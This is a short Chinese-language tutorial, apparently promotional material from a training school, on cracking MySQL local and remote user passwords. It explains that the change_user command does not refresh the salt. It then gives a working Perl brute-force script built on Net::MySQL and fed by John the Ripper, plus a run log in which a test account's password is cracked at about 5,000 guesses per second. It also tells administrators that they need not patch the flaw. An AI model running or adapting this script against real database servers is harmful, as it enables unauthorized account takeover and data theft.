洛阳北大青鸟教你如何破解MySQL本地和远程密码

快速的MySQL 本地和远程密码破解!首先需要对数据库维护人员说明的是，不必紧张，你无需修补这个问题，看起来其实是个小错误而已。

洛阳北大青鸟的专业课程老师找到一个方法可非常高效的破解MySQL 的用户密码，包括本地用户和通过网络方式访问的用户密码。在我的测试中，通过网络方式的方法可每秒钟测试5000 个密码。

方法如下：攻击者使用一个无特权帐号登录到MySQL 服务器，mysql 有一个名为change_user 的命令，该命令可用于在mysql 会话中修改用户时的名字建议。因为这个命令执行非常快，因此可以很快速的用来破解mysql 密码，而不是每次都重新连接到mysql 服务器。

是什么导致非常慢？

因为使用change_user 命令不会更改SALT(这是一个弱点)，而常规破解密码的方法每次连接时服务器都发送不同的SALT。

下面是一个Perl 脚本使用了John the Ripper 的方法来生成密码：

测试的用户是crackme 密码为pass，只需数秒就可破解。

(大约20 秒钟可测试10 万密码)

测试脚本如下：

use Net::MySQL;

$|=1;

my $mysql = Net::MySQL->new(

hostname => '192.168.2.3',

database => 'test',

user => "user",

password => "secret",

debug => 0,

);

$crackuser = "crackme";

while() {

chomp;

$currentpass = $_;

$vv = join "\0",

$crackuser,

"\x14".

Net::MySQL::Password->scramble(

$currentpass, $mysql->{salt}, $mysql->{client_capabilities}

) . "\0";

if ($mysql->_execute_command("\x11", $vv) ne undef) {

print "[*] Cracked! --> $currentpass\n";

exit;

}

}

下面是我这台机器上的执行结果：

C:\Users\kingcope\Desktop>C:\Users\kingcope\Desktop\john179\run\jo

hn --incremental --stdout=5 | perl mysqlcrack.pl

Warning: MaxLen = 8 is too large for the current hash type, reduced to 5

words: 16382 time: 0:00:00:02 w/s: 6262 current: citcH

words: 24573 time: 0:00:00:04 w/s: 4916 current: rap

words: 40956 time: 0:00:00:07 w/s: 5498 current: matc3

words: 49147 time: 0:00:00:09 w/s: 5030 current: 4429

words: 65530 time: 0:00:00:12 w/s: 5354 current: ch141

words: 73721 time: 0:00:00:14 w/s: 5021 current: v3n

words: 90104 time: 0:00:00:17 w/s: 5277 current: pun2

[*] Cracked! --> pass

words: 98295 time: 0:00:00:18 w/s: 5434 current: 43gs

Session aborted

via grok